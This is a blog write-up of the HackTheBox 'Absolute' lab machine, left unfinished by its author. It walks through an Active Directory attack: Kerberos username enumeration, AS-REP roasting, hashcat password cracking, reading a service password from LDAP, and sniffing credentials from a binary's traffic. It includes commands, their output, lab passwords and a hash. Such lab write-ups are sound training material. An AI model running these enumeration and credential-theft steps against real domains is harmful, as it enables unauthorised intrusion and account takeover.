hackthebox absolute insane

发布时间 2023-12-27 14:19:56作者: lisenMiller

 

信息收集

Pay attention to the last line ssl-date: we have 7 hour clock skew,which should keep in mind if doing any keberos auth.

SMB-TCP445

smbclient -N -L //10.10.11.181    #对面拒绝连接

crackmapexec smb absolute.htb     #对面存在smb

crackmapexec smb absolute.htb --shares  #拒绝连接

Not able to connect the smb without creds:

LDAP-TCP389+

ldapsearch -H ldap://dc.absolute.htb -x -s namingcontexts #探测有什么LDAP的内容

ldapsearch -H dc.absolute.htb -x -b "DC=absolute,DC=htb"  #error ,comment:In order to perform this operation a successful find must be completed on the connection.

DNS-TCP/UDP53

Domain DNS zone transfer  #axfr request  #error

dig +noall +answer @10.10.11.181 axfr absolute.htb
;Transfer Failed

Comfirm the two names we have already know:


dig +noall +answer @10.10.11.181 absolute.htb      
absolute.htb.           600     IN      A       10.10.11.181

dig +noall +answer @10.10.11.181 dc.absolute.htb
dc.absolute.htb. 3600 IN A 10.10.11.181

Brute forcing subdomains with dnsenum,it finds some other subdomain via bruteforce

dnsenum --dnsserver 10.10.11.181 -f /home/xx/seclists/discover/xxsub.txt absolute.htb
Brute forcing with /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:
________________________________________________________________________________
dc.absolute.htb. 1200 IN A 10.10.11.181
gc._msdcs.absolute.htb. 600 IN A 10.10.11.181
domaindnszones.absolute.htb. 600 IN A 10.10.11.181
forestdnszones.absolute.htb. 600 IN A 10.10.11.18

we have no any clues to follow.

WEBSITE ACCESS

Accessing the website,we only find a js page and rotating prictures.

Also run the gobuster for directory brute force but get nothing.(some js,css,images direcotry and fonts)

We can also blast the .git/.svn or .bak file as you want.

Colleting Authorname from picture

curl http://absolute.htb/images/hero_1.jpg -o hero_1.jpg

Using exiftool to analys it,we can find that there is property named Author indicates the username.

Utilizing the shell to collet all the Author name from six pictures as follow:

for i in $(seq 1 6);do exiftool hero_${i} | grep Author| awk -F':' '{print $2}';done > username.txt
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith

Auth as d.klay

Enumerate the valid username in doamin

We can take each of these and generate a list of possible common usernams.

using username-anarchy to create several type of username

username-ananrchy -i username.txt

Bruteforce the kerberos username

kerbrute userenum --dc dc.absolute.htb -d absolute.htb username.txt

2023/05/21 13:57:41 >  Using KDC(s):
2023/05/21 13:57:41 >   dc.absolute.htb:88

2023/05/21 13:57:41 >  [+] VALID USERNAME:       j.roberts@absolute.htb
2023/05/21 13:57:41 >  [+] VALID USERNAME:       m.chaffrey@absolute.htb
2023/05/21 13:57:41 >  [+] VALID USERNAME:       s.osvald@absolute.htb
2023/05/21 13:57:41 >  [+] VALID USERNAME:       d.klay@absolute.htb
2023/05/21 13:57:41 >  [+] VALID USERNAME:       j.robinson@absolute.htb
2023/05/21 13:57:41 >  [+] VALID USERNAME:       n.smith@absolute.htb

It's clear that this domain is using [first initial].[lastname] as the username syntax.

Alternatively,crackmapexec can also handle this check.

crackmapexec smb 10.10.11.181 -u username.txt -p ''

The response show that absolute.htb\m.chaffrey: STATUS_ACCOUNT_RESTRICTION means the account exists.

Caputure the hash with AS-Rep-Roast

GetNPUsers.py -dc-ip 10.10.11.181 -usersfile username.txt absolute.htb

Get the ntlm hash of user d.klay

$krb5asrep$23$d.klay@ABSOLUTE.HTB:2a2e0aaa2470ba242b93912b2bba822c$d4e1d394971ea4ccc48e189b913c18a9971ab1e52dbd4ecf3e9fe80bb667d4e23c79ee5fc81bc0c65333b417bd81b986b766ffc95d21a7d14e2f4ab3ac620cfc6742687db4282d88b7ae9f8d321f5bfc9dd02039ac0d4c2f5dab270b00813f82eb43bc3e566897cd3ed03d4eb713f61f68e7c18a0cc0e190ec376aac4983432d57f8dc223536807c2198f770cf7aafcde0a940319135b5c3314f83829363af6e458ed140da97f1668c16ac6d859c720f015d744342b92d35015bd87683acab41f6b3f1a16b9e5fb914a0f7afd54b4406113cc317e58a93d039aa296a0702f78b3dd91b02ca013373cd2bb760

Crack Password

echo 'hash' > d.klay.hash
hashcat d.klay.hash /usr/share/wordlists/rockyou.txt

Darkmoonsky248girlThis is the plain password

Testing validate for username and password

crackmapexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl'
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION 

STATUS_ACCOUNT_RESTRICTION means the password is still disabled.Use kerberos for auth (-k)

SMB         10.10.11.181    445    DC               [-] absolute.htb\d.klay: KRB_AP_ERR_SKEW #

 It show an error saying clock skew is too great.

sudo ntpdate 10.10.11.181/dc.absolute.htb/absolute.htb #BUT STILL KRB_AP_ERR_SKEW
timedatectl set-ntp false #turn off the autoupgrate time settin
crackmapexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k  #success
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl

Get TGT

getTGT.py 'absolute.htb/d.klay:Darkmoonsky248girl'
export KRB5CCNAME=d.klay.ccach

Auth as svc_smb

SMB

With Creds,look at the smb shares

crackmapexec smb dc.absolute.htb -k -u d.klay -p 'Darkmoonsky248girl' --shares
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         dc.absolute.htb 445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
SMB         dc.absolute.htb 445    DC               [+] Enumerated shares
SMB         dc.absolute.htb 445    DC               Share           Permissions     Remark
SMB         dc.absolute.htb 445    DC               -----           -----------     ------
SMB         dc.absolute.htb 445    DC               ADMIN$                          Remote Admin                                                                                              
SMB         dc.absolute.htb 445    DC               C$                              Default share                                                                                             
SMB         dc.absolute.htb 445    DC               IPC$            READ            Remote IPC
SMB         dc.absolute.htb 445    DC               NETLOGON        READ            Logon server share                                                                                        
SMB         dc.absolute.htb 445    DC               Shared                          
SMB         dc.absolute.htb 445    DC               SYSVOL          READ            Logon server share 

We can use this cred to access smb directory.

Then we can use smbclient.py connect the service


smbclient.py 'absolute.htb/d.klay:Darkmoonsky248girl@dc.absolute.htb' -k -no-pass
[-] CCache file is not found. Skipping...
Type help for list of command
#shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use SYSVOL
# ls
drw-rw-rw- 0 Thu Jun 9 16:16:22 2022 .
drw-rw-rw- 0 Thu Jun 9 16:16:22 2022 ..
drw-rw-rw- 0 Thu Jun 9 16:16:22 2022 absolute.htb
# cd absolute.htb
# ls
drw-rw-rw- 0 Thu Jun 9 16:22:18 2022 .
drw-rw-rw- 0 Thu Jun 9 16:22:18 2022 ..
drw-rw-rw- 0 Tue Dec 19 15:47:21 2023 DfsrPrivate
drw-rw-rw- 0 Thu Jun 9 16:16:22 2022 Policies
drw-rw-rw- 0 Thu Jun 9 16:16:22 2022 scripts
no thing here

LDAP

1.crackmapexec

crackmapexec ldap dc.absolute.htb -u d.klay -p 'Darkmoonsky248girl' -k --user
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        dc.absolute.htb 389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
LDAP        dc.absolute.htb 389    DC               [*] Total of records returned 20
LDAP        dc.absolute.htb 389    DC               Administrator                  Built-in account for administering the computer/domain                                               
LDAP        dc.absolute.htb 389    DC               Guest                          Built-in account for guest access to the computer/domain                                             
LDAP        dc.absolute.htb 389    DC               krbtgt                         Key Distribution Center Service Account                                                              
LDAP        dc.absolute.htb 389    DC               J.Roberts                      
LDAP        dc.absolute.htb 389    DC               M.Chaffrey                     
LDAP        dc.absolute.htb 389    DC               D.Klay                         
LDAP        dc.absolute.htb 389    DC               s.osvald                       
LDAP        dc.absolute.htb 389    DC               j.robinson                     
LDAP        dc.absolute.htb 389    DC               n.smith                        
LDAP        dc.absolute.htb 389    DC               m.lovegod                      
LDAP        dc.absolute.htb 389    DC               l.moore                        
LDAP        dc.absolute.htb 389    DC               c.colt                         
LDAP        dc.absolute.htb 389    DC               s.johnson                      
LDAP        dc.absolute.htb 389    DC               d.lemm                         
LDAP        dc.absolute.htb 389    DC               svc_smb                        AbsoluteSMBService123!                                                                               
LDAP        dc.absolute.htb 389    DC               svc_audit                      
LDAP        dc.absolute.htb 389    DC               winrm_user                     Used to perform simple network tasks 

bingo! we directly see the password and username in the response svc_smb:AbsoluteSMBService123!

crackmapexec smb dc.absolute.htb -u svc_smb -p 'AbsoluteSMBService123!' -k
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         dc.absolute.htb 445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService12

2.ldapsearch

ldapsearch -H ldap://dc.absolute.htb -x -D d.klay@absolute.htb -w Darkmoonsky248girl -s base       
ldap_bind: Invalid credentials (49)
        additional info: 80090308: LdapErr: DSID-0C090439, comment: AcceptSecurityContext error, data 52f, v4563

Shell as m.lovegod

As svc_smb,get read access to serveral shares:

crackmapexec smb dc.absolute.htb -k -u svc_smb -p 'AbsoluteSMBService123!' --shares
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         dc.absolute.htb 445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123! 
SMB         dc.absolute.htb 445    DC               [+] Enumerated shares
SMB         dc.absolute.htb 445    DC               Share           Permissions     Remark
SMB         dc.absolute.htb 445    DC               -----           -----------     ------
SMB         dc.absolute.htb 445    DC               ADMIN$                          Remote Admin
SMB         dc.absolute.htb 445    DC               C$                              Default share
SMB         dc.absolute.htb 445    DC               IPC$            READ            Remote IPC
SMB         dc.absolute.htb 445    DC               NETLOGON        READ            Logon server share 
SMB         dc.absolute.htb 445    DC               Shared          READ            
SMB         dc.absolute.htb 445    DC               SYSVOL          READ            Logon server share 

I have access to Shared,connect with impacket-smbclient

impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] CCache file is not found. Skipping...
Type help for list of commands
# use shared
# ls
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 .
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 ..
-rw-rw-rw- 72 Thu Sep 1 13:02:23 2022 compiler.sh
-rw-rw-rw- 67584 Thu Sep 1 13:02:23 2022 test.exe

Download these two file

file test.exe 
test.exe: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows

Dynamic Analysis

I will turn to the windows machine and run this exe file.Nothing happes.

The next step is run with Wireshark and notice that there's a bunch of DNS queries going out:

 image-20230522154143073image-20230522154143073

 I’ll update my hosts file to include _ldap._tcp.dc.absolute.htb, and re-run the program. After 25-30 seconds after execution, there’s an attempt to bind to LDAP on Absolute:

image-20230522154437465

Following that stream,it looks like there may be creds in there:

image-20230522154514432

And the creds is mlovegod/AbsoluteLDAP2022!.But the username format in this box is x.xxxx.So this name should be m.lovegod

The next step should be success.But I always get error from the box.Readers can learn the following step from other writeup

OPERATION ATTENTION

0.Create a python visual environment

python3 -m venv .venv
source .venv/bin/active
pip3 install . #install dependencies 

1.The essentially thing is the time must the same to domain controller.

2.Remember that we need to be sensitive with any username we can find.

3.If we have done directory bruteforce,fuzz subdomain,or other clues to web,at last we can collect the username from picture property named Author.

4.SMBCLIENT INSTRUCTION:-N:don't ask password -L: List the file that shares -U: specify username

command INSTRUCTION: 

recurse on: Start recursion 

prompt off: turn off the hint 

5.impacket-getNPUser from impacket

#To query which users in a domain do not need Kerberos pre-authentication,only any donamin user can be used.

#As long as a user doesn't need to kerberos pre-authentication,its as_req can be obtained and used to burst its password 

6.Start a visual environment when using the python script

python3 -m venv .venv 
source .venv/bin/activate #activate the visual environment

7. Search for hashcat crack mode 

https://hashcat.net/wiki/doku.php?id=example_hashes #This url is the hash mode we can compare.

KERBEROS ERROR

1.STATUS_ACCOUNT_RESTRICTION:Account restrictions are preventing this user from signing in. For example: blank passwords aren't allowed, sign-in times are limited, or a policy restriction has been enforced. #We need to use kerberos authentication '-k' parameter.

2.If the clock skew between my time and the DC’s is too large, this will fail. In VirtualBox, I’ll need to stop the guest tools from syncing the clock with sudo service vboxadd-service stop. Then I’ll run sudo ntpdate 10.10.11.181.

3.LDAPSEARH INSTRCUTION
situation one:
ldapsearch -H ldap://dc.absolute.htb -x -D d.klay@absolute.htb -w Darkmoonsky248girl -s base
ldap_bind: Invalid credentials (49)
        additional info: 80090308: LdapErr: DSID-0C090439, comment: AcceptSecurityContext error, data 52f, v4563

Here have a error called AcceptSecurityContext means the account is restricted (no NTLM,only kerberos)

Using -Y GSSAPI to specify the kerberos auth.

With kinit having a ticket, I was still getting this error:

ldapsearch -H ldap://dc.absolute.htb -Y GSSAPI -b "dc=absolute,dc=htb"                  
SASL/GSSAPI authentication started                                                                                                      
ldap_sasl_interactive_bind: Local error (-2)                                                                                            
        additional info: SASL(-1): generic failure: GSSAPI Error: Unspecified GSS failure.  Minor code may provide more information (Server not found in Kerberos database) 

To fix this, I’ll make sure that dc.absolute.htb comes before absolute.htb in my /etc/hosts file. That’s because Kerberos is doing a reverse lookup on the IP to get the server name. My OS checks the hosts file, and gets the first host with that IP. Then when it tries to look up that host (absolute.htb) in the Kerberos DB, it doesn’t find one, and returns Server not found in Kerberos database. Props to Ippsec for figuring this out - he shows this in Wireshark in his video.

/etc/krb5.conf + /etc/resolv.conf + /etc/hosts